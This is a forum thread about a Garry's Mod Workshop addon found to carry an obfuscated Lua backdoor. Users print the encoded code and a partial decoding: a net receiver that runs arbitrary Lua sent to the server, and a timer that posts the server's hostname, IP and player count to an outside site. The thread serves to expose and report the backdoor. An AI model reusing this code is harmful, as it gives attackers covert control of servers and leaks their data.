Workshop virus

I didn’t find an official thread for this I saw only some spread out ones about addons kicking people or saying out of date etc so I thought it’d be better to make my own thread.
I just decided to scan my computer using Avast! and it found a:
JS:ScriptDC-inf [Trj] virus which was of “High” danger in this .gma file:

Uncertain what it means but well, anyone else ran into this?

The lua file contains code tabbed right across

Addon by Demonic King
local ms = “\83\69\82\86\69\82\103\97\109\101\73\115\68\101\100\105\99\97\116\101\100\67\111\109\112\105\108\101\83\116\114\105\110\103\117\116\105\108\65\100\100\78\101\116\119\111\114\107\83\116\114\105\110\103\110\101\116\82\101\99\101\105\118\101\114\115\91\67\93\115\116\114\105\110\103\116\105\109\101\114\83\105\109\112\108\101\104\116\116\112\80\111\115\116\104\116\116\112\58\47\47\103\109\111\100\46\104\105\110\116\115\46\109\101\47\71\101\116\67\111\110\86\97\114\83\116\114\105\110\103\104\111\115\116\110\97\109\101\105\112\112\108\97\121\101\114\71\101\116\65\108\108\109\57\107\95\97\100\100\111\110\115\82\101\97\100\83\116\114\105\110\103\116\121\112\101\120\112\99\97\108\108\82\101\99\101\105\118\101” local mt = {0, 6, 10, 21, 34, 38, 54, 57, 66, 69, 75, 80, 86, 90, 94, 115, 130, 138, 140, 146, 152, 162, 172, 176, 182} local l = (function(n) return ms:sub(mt[n] + 1, mt[n + 1]) end) local g = (function(n) return _G[l(n)] end) if g(1) and g(2)l(3) then local f = (function() end) local c = g(4) local r = g(7)[l(22)] g(5)l(6) g(7)[l(8)][l(21)] = (function() local s = c(r() or “–”, l(9), false) if g(23)(s) ~= l(10) then g(24)(s, f) end end) g(11)[l(12)](16, function() g(13)[l(14)](l(15), {hn = g(16)(l(17)), ip = g(16)(l(18)), np = #g(19)l(20)}, f, f) end) end
player_manager.AddValidModel( “Alien”, “models/player/vad36alien/praetorian_ver2.mdl” );
list.Set( “PlayerOptionsModel”, “Alien”, “models/player/vad36alien/praetorian_ver2.mdl” );

I’m surprised if Avast is actually detecting that, addon backdoors have got popular enough that AVs detect them now.

Hmm Avast doesn’t even let me enter this thread anymore because of your post :smiley:

The decrypted backdoor is:

[lua]if SERVER and game.IsDedicated() then
local f = function() end
net.Receivers[“m9k_addons”] = (function()
local s = CompileString(net.ReadString() or “–”, ‘[C]’, false)
if type(s) ~= “string” then
xpcall(s, f)
{ hn = GetConVarString(‘hostname’),
ip = GetConVarString(‘ip’),
np = #player.GetAll() },
f, f

[editline]4th May 2015[/editline]

Did a google search for JS:ScriptDC-inf [Trj] and found this

Checked the addons mentioned, these have the same code: “EMS Sasuke” by the same author “Hinata”, same author

Very surprised these were not caught a lot sooner. Will do a few more scans of the author’s addons.

All that code seems to be doing is sending the ip, server name, and players to a website though that code definitely shouldn’t be there. Reported.

Trying to track which servers use your addon isn’t so bad. Regardless, there are way less shitty, way less intrusive ways to to it, and obfuscating the damn thing isn’t helping his case any.

Backdoors are so fucking stupid. If you’re going to do something malicious you could at least be somewhat creative.

Addon creators often say they collect this information to track who is using their addons, however they really should not be collecting IP addresses on that scale without saying anything.

While it is not that very well detected, the backdoor does get detected.

Virus Total of Alien Addon:

Remember, stuff like this can be reported:

EDIT: Just did a scan of the author’s latest addon. The code does not seem to be in it.

It’s best if you also PM me such addons, all 3 are banned, I also banned three others from same authors that had the same backdoor.

[editline]4th May 2015[/editline]

Kept looking, and the number raised to like 10 more naughty addons.

He is tracking servers to know on which servers he can run his backdoor which allows him to run Lua on the server using the net library.

Just opening this facepunch post sets off Avast!

Ok thanks, will remember for next time.

Good work for calling these things out. However there’s still a lot more malicious software on Garrys mod it’s just disguised to look like it’s doing a good job when it’s not…

Hey guys its me, thought I’d drop by and say a few things. I do backdoor (almost) all my addons. Feel free to spam my addons or comment on my page about how I was caught.

I’ve stopped playing gmod since 12/29/2014 and didn’t feel like sifting through my addons to remove the backdoors. It did send the server ip, name and players to a website which is long gone.

I wont deny any of this but if you would like me to upload a clean version of my addons (assuming I still have the files) then I will. Just let me know which ones you would like to see back in the workshop. I’m currently deleting all the banned workshop addons.

I’m usually very nervous about things like these and I’d like to ask: I got some of these same infection notices by Avast too a week ago. What I get is that the threat in these malicious addons just affects the game itself, but do they affect the whole computer in general?

No your computer is perfectly fine.

It is kind of nice that a virus killer even detects a back door for a game, isn’t it?

If you really want to track servers that have your addon, then I suggest you use GameTracker’s search server variable feature. That way you don’t need to post people’s ips and you could enjoy playing on a server with your favorite addon.

You’re not gonna get a virus from a workshop addon, unless they do some wacko crazy shit never done before.

Also if you run a server just don’t use the workshop. Download the addons from there, extract them with gmad, and scim through the code to check for backdoors.

Maybe not done in a public workshop addon, but things like this are possible. Not just for Garry’s Mod, but multiple games on Steam on multiple engines. Always be a little thoughtful about who you trust content from.